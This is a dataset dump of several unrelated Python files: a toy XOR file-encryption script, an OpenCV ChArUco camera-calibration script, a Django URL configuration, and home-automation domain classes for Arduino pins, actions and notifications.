c = fp1.read(1)
i+=1
fp3.close()
fp1.close()
def swapper1(fname):
pivot = 0b10101010
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
fp3 = open(fname+'.out2', 'wb')
c = fp1.read(1)
while c:
ec = encrypt(c, pivot)
fp2.write(ec)
dec = encrypt(ec, pivot)
fp3.write(dec)
c = fp1.read(1)
fp3.close()
fp2.close()
fp1.close()
def encrypt(_bytes, pivot):
''''''
assert len(_bytes)==1
return bytes([_bytes[0] ^ pivot])
def encrypt_file(fname, passphrase):
UNIT=8 # 8bits per byte
bitkey = ''.join([bin(ord(c)).lstrip('0b').zfill(UNIT) for c in passphrase])
keysize, remainder = divmod(len(bitkey),UNIT)
#import pdb; pdb.set_trace()
assert remainder == 0
#assert is_multiple_of_two(keysize)
pivot = int(bitkey, 2)
key_in_bytes = convert_to_bytes(pivot, UNIT)
fp1 = open(fname, 'rb')
fp2 = open(fname+'.out1', 'wb')
bits = fp1.read(keysize)
while bits:
ec = encrypt_mbitwise(bits, key_in_bytes)
fp2.write(ec)
bits = fp1.read(UNIT)
fp2.close()
fp1.close()
def convert_to_bytes(integer, bytes_size):
'''returns bytes that is converted from given integer'''
result = bytearray()
src = bin(integer).lstrip('0b').zfill(bytes_size*8)
for i in range(0, len(src), 8):
_int = int(src[i:i+8],2)
result.append(_int)
return bytes(result)
def encrypt_mbitwise(bytes, key_in_bytes):
'''returns encrypted bytes in type of bytearray'''
return bytearray([a^b for a,b in zip(bytes, key_in_bytes)])
def is_multiple_of_two(n):
'''returns true if n is multiple of two, else false'''
return 0 <= bin(n).count('1') <= 1
if __name__=="__main__":
import sys
fname = sys.argv[1]
encrypt_file(fname, '루이보스보리차!@#')
#encrypt_file(fname, 'password')
#encrypt_file(fname, '<PASSWORD>')
|
StarcoderdataPython
|
8174856
|
<gh_stars>1-10
import cv2
from cv2 import aruco
import numpy as np
import matplotlib.pyplot as plt
images=[
"board/0.jpg",
"board/1.jpg",
"board/2.jpg",
"board/3.jpg",
"board/4.jpg",
"board/5.jpg",
"board/6.jpg",
"board/7.jpg",
"board/8.jpg",
"board/9.jpg",
"board/10.jpg",
"board/11.jpg",
"board/12.jpg",
"board/13.jpg",
"board/14.jpg",
"board/15.jpg",
"board/16.jpg",
"board/17.jpg",
"board/18.jpg",
"board/19.jpg",
"board/20.jpg",
"board/21.jpg",
"board/22.jpg",
"board/23.jpg",
]
close_images=[
"board/0.jpg",
"board/1.jpg",
"board/6.jpg",
"board/8.jpg",
"board/9.jpg",
"board/10.jpg",
"board/11.jpg",
"board/12.jpg",
"board/13.jpg",
"board/14.jpg",
"board/15.jpg",
"board/16.jpg",
"board/17.jpg",
"board/18.jpg",
"board/19.jpg",
"board/20.jpg",
"board/21.jpg",
"board/22.jpg",
"board/23.jpg",
]
images=close_images
images=[
"board2/1.jpg",
"board2/2.jpg",
"board2/3.jpg",
"board2/4.jpg",
"board2/5.jpg",
"board2/6.jpg",
"board2/7.jpg",
]
aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_250)
board = aruco.CharucoBoard_create(8, 5, 0.36, .27, aruco_dict)
#imboard = board.draw((2000, 2000))
#cv2.imwrite("chessboard.tiff", imboard)
def read_chessboards(images):
"""
Charuco base pose estimation.
"""
print("POSE ESTIMATION STARTS:")
allCorners = []
allIds = []
decimator = 0
# SUB PIXEL CORNER DETECTION CRITERION
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.00001)
for im in images:
print("=> Processing image {0}".format(im))
frame = cv2.imread(im)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
corners, ids, rejectedImgPoints = cv2.aruco.detectMarkers(gray, aruco_dict)
if len(corners)>0:
# SUB PIXEL DETECTION
for corner in corners:
cv2.cornerSubPix(gray, corner,
winSize = (3,3),
zeroZone = (-1,-1),
criteria = criteria)
res2 = cv2.aruco.interpolateCornersCharuco(corners,ids,gray,board)
if res2[1] is not None and res2[2] is not None and len(res2[1])>3 and decimator%1==0:
allCorners.append(res2[1])
allIds.append(res2[2])
decimator+=1
imsize = gray.shape
return allCorners,allIds,imsize
allCorners,allIds,imsize=read_chessboards(images)
def calibrate_camera(allCorners,allIds,imsize):
"""
Calibrates the camera using the dected corners.
"""
print("CAMERA CALIBRATION")
cameraMatrixInit = np.array([[ 1000., 0., imsize[0]/2.],
[ 0., 1000., imsize[1]/2.],
[ 0., 0., 1.]])
distCoeffsInit = np.zeros((5,1))
flags = (cv2.CALIB_USE_INTRINSIC_GUESS + cv2.CALIB_RATIONAL_MODEL + cv2.CALIB_FIX_ASPECT_RATIO)
(ret, camera_matrix, distortion_coefficients0,
rotation_vectors, translation_vectors,
stdDeviationsIntrinsics, stdDeviationsExtrinsics,
perViewErrors) = cv2.aruco.calibrateCameraCharucoExtended(
charucoCorners=allCorners,
charucoIds=allIds,
board=board,
imageSize=imsize,
cameraMatrix=cameraMatrixInit,
distCoeffs=distCoeffsInit,
flags=flags,
criteria=(cv2.TERM_CRITERIA_EPS & cv2.TERM_CRITERIA_COUNT, 10000, 1e-9))
return ret, camera_matrix, distortion_coefficients0, rotation_vectors, translation_vectors
ret, mtx, dist, rvecs, tvecs = calibrate_camera(allCorners,allIds,imsize)
print ret
print " ----------"
print mtx
print " ----------"
print dist
i=2# select image id
plt.figure()
frame = cv2.imread(images[i])
img_undist = cv2.undistort(frame,mtx,dist,None)
plt.subplot(1,2,1)
plt.imshow(frame)
plt.title("Raw image")
plt.axis("off")
plt.subplot(1,2,2)
plt.imshow(img_undist)
plt.title("Corrected image")
plt.axis("off")
plt.show()
###################################################################
#Piere version:
K16VGA_RESOLUTION = {"x": 2560, "y": 1920}
CAMERA_RESOLUTIONS = [1,2,3,4,5,6,7]
CAMERA_DISTORTION_COEFF = np.array(
[[0.13086823, -0.44239733, 0.0004841, -0.00322714, 0.16996254]])
CAMERA_MATRIX_RESOLUTION_2560_1920 = np.array([
[2.41523736e+03, 0.00000000e+00, 1.25128063e+03],
[0.00000000e+00, 2.41690366e+03, 9.94791007e+02]])
CAMERA_MATRIX_RESOLUTION_INDEPENDANT = np.array([
[0.00000000e+00, 0.00000000e+00, 1.00000000e+00]
])
CAMERA_DATAS_AT_RESOLUTION = {
camera_resolution: {
"matrix": np.append(
CAMERA_MATRIX_RESOLUTION_2560_1920 / (2.**i),
CAMERA_MATRIX_RESOLUTION_INDEPENDANT, axis=0
),
"image_size": (
K16VGA_RESOLUTION["x"] / (2**i),
K16VGA_RESOLUTION["y"] / (2**i)
),
"fps": 5,
}
for i, camera_resolution in enumerate(CAMERA_RESOLUTIONS)
}
print CAMERA_DATAS_AT_RESOLUTION
mtx = np.array([[1.20761868e+03, 0.00000000e+00, 6.25640315e+02],
[0.00000000e+00, 1.20845183e+03, 4.97395504e+02],
[0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])
|
StarcoderdataPython
|
6450881
|
class BiosModelReaction:
def __init__(self, json, api=None, uid=None, id=None, model=None):
self.json_data = json
self.api = api
#self.database = database
@property
def id(self):
return self.json_data['id']
@property
def uid(self):
return self.json_data['bios_id']
@property
def name(self):
return self.json_data['name']
def decode_stoich_value(self, v):
if v == None or len(v.strip()) == 0:
return 1
else:
return float(v)
def get_stoichiometry(self):
s = {}
for o in self.json_data['bios_stoichiometry']['l']:
s[o[0]] = -1 * self.decode_stoich_value(o[2])
for o in self.json_data['bios_stoichiometry']['r']:
s[o[0]] = self.decode_stoich_value(o[2])
return s
def get_cstoichiometry(self, metabolites):
s = {}
for o in self.json_data['bios_stoichiometry']['l']:
if o[0] in metabolites:
s[(o[0], metabolites[o[0]]['compartment'])] = -1 * self.decode_stoich_value(o[2])
for o in self.json_data['bios_stoichiometry']['r']:
if o[0] in metabolites:
s[(o[0], metabolites[o[0]]['compartment'])] = self.decode_stoich_value(o[2])
return s
@property
def cstoichiometry(self):
cstoichiometry = {}
if 'bios_stoichiometry' in self.json_data:
for h in self.json_data['bios_stoichiometry']['l']:
if type(h[2]) == str and len(h[2]) == 0:
h[2] = '1'
cstoichiometry[(h[0], '?')] = -1 * float(h[2])
for h in self.json_data['bios_stoichiometry']['r']:
if type(h[2]) == str and len(h[2]) == 0:
h[2] = '1'
cstoichiometry[(h[0], '?')] = float(h[2])
return cstoichiometry
|
StarcoderdataPython
|
8192625
|
<reponame>rputh055/crawlzerotest
from django.conf.urls import url
from crawlzero import views
# SET THE NAMESPACE!
app_name = 'crawlzero'
# Be careful setting the name to just /login use userlogin instead!
urlpatterns=[
url(r'^register/$',views.register,name='register'),
url(r'^user_login/$',views.user_login,name='user_login'),
url(r'^upload_file/$',views.upload_file,name='upload_file'),
]
|
StarcoderdataPython
|
6579616
|
from datetime import time
from typing import List, Optional
class Arduino:
def __init__(self, id: int, name: str, template_id: int):
self.__id = id
self.name = name
self.template_id = template_id
@property
def id(self) -> int:
return self.__id
class Template:
def __init__(self, id: int, name: str, nb_input_pins: int, nb_output_pins: int):
self.__id = id
self.name = name
self.nb_input_pins = nb_input_pins
self.nb_output_pins = nb_output_pins
@property
def id(self) -> int:
return self.__id
class OutputPin:
def __init__(self, id: int, number: int, parent_id: int):
self.parent_id = parent_id
self.number = number
self.__id = id
@property
def id(self) -> int:
return self.__id
class InputPin:
def __init__(self, id: int, number: int, action_ids: List[int], parent_id: int, time_between_clicks: float):
self.parent_id = parent_id
self.action_ids = action_ids
self.number = number
self.time_between_clicks = time_between_clicks
self.__id = id
@property
def id(self) -> int:
return self.__id
class Action:
def __init__(self,
id: int,
action_type: int,
trigger_id: int,
notification_ids: List[int],
delay: int,
timer: int,
output_pin_ids: List[int],
condition_id: Optional[int],
master_id: Optional[int],
click_number: int,
dimmer_speed: Optional[int],
cancel_on_button_release: Optional[bool],
dimmer_light_value: Optional[int],
master_dimmer_id: Optional[int]):
"""
Creates a new Action
:param id: The identifier of this action
:param action_type: The kind of action. See src.button.domain.ActionType class for possible values
:param trigger_id: The identifier of the trigger of this action
:param notification_ids: The identifiers of the notifications of this action. Can be empty.
:param delay: The delay before this action should be executed.
:param timer: The timer after which the action should be reverted. Only applies for ON/OFF actions
:param output_pin_ids: The identifiers of the output pins affected by this action.
:param condition_id: The (optional) identifier of the condition that should apply for this action.
:param master_id: The master pin that should determine the TOGGLE action. This pin will be looked at when
determining whether it should toggle on or off
:param click_number: Number of times that has to be clicked on multiclick action to activate
:param dimmer_speed: How fast/slow the dimmer has to change light intensity
:param cancel_on_button_release: If this is set to true, the dimmer will stop dimming as soon
as the button is released
:param dimmer_light_value: If set to -1, a dimmer will remember its last known value before switching off
If set to a value, a dimmer will go to this value by default/not remember last value
:param master_dimmer_id: The identifier of the dimmer whose last known value should be taken when switching
the dimmer on.
"""
# General properties
self.__id = id
self.__trigger_id = trigger_id
self.__action_type = action_type
self.__delay = delay
self.__output_pin_ids = output_pin_ids
self.__notification_ids = notification_ids
self.__condition_id = condition_id
self.__click_number = click_number
# ON/OFF/ON_DIMMER/OFF_DIMMER action
self.__timer = timer
# TOGGLE/TOGGLE_DIMMER action
self.__master_id = master_id
# DIMMER
self.__dimmer_speed = dimmer_speed
self.__cancel_on_button_release = cancel_on_button_release
# ON_DIMMER/TOGGLE_DIMMER action
self.__dimmer_light_value = dimmer_light_value
self.__master_dimmer_id = master_dimmer_id
@property
def id(self) -> int:
return self.__id
@property
def trigger_id(self) -> int:
return self.__trigger_id
@property
def action_type(self) -> int:
return self.__action_type
@property
def notification_ids(self) -> List[int]:
return self.__notification_ids
@property
def delay(self) -> int:
return self.__delay
@property
def output_pin_ids(self) -> List[int]:
return self.__output_pin_ids
@property
def timer(self) -> int:
return self.__timer
@property
def condition_id(self) -> Optional[int]:
return self.__condition_id
@property
def master_id(self) -> Optional[int]:
return self.__master_id
@property
def click_number(self) -> int:
return self.__click_number
@property
def dimmer_speed(self) -> Optional[int]:
return self.__dimmer_speed
@property
def cancel_on_button_release(self) -> Optional[bool]:
return self.__cancel_on_button_release
@property
def dimmer_light_value(self) -> Optional[int]:
return self.__dimmer_light_value
@property
def master_dimmer_id(self) -> Optional[int]:
return self.__master_dimmer_id
class Trigger:
def __init__(self, id: int, trigger_type: int, seconds_down: Optional[int]):
self.__id = id
self.trigger_type = trigger_type
self.seconds_down = seconds_down
@property
def id(self) -> int:
return self.__id
class Condition:
def __init__(self, id: int, type: int, operator: Optional[int], condition_ids: Optional[List[int]],
output_pin_id: Optional[int], status: Optional[bool], from_time: Optional[time],
to_time: Optional[time]):
self.__id = id
self.type = type
self.to_time = to_time
self.from_time = from_time
self.status = status
self.output_pin_id = output_pin_id
self.condition_ids = condition_ids
self.operator = operator
@property
def id(self) -> int:
return self.__id
class Notification:
def __init__(self, id: int, message: str, notification_type: int, enabled: bool, subject: Optional[str],
mail_address: List[str], tokens: List[str]):
self.__id = id
self.notification_type = notification_type
self.message = message
self.enabled = enabled
self.subject = subject
self.emails = mail_address
self.tokens = tokens
@property
def id(self) -> int:
return self.__id
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.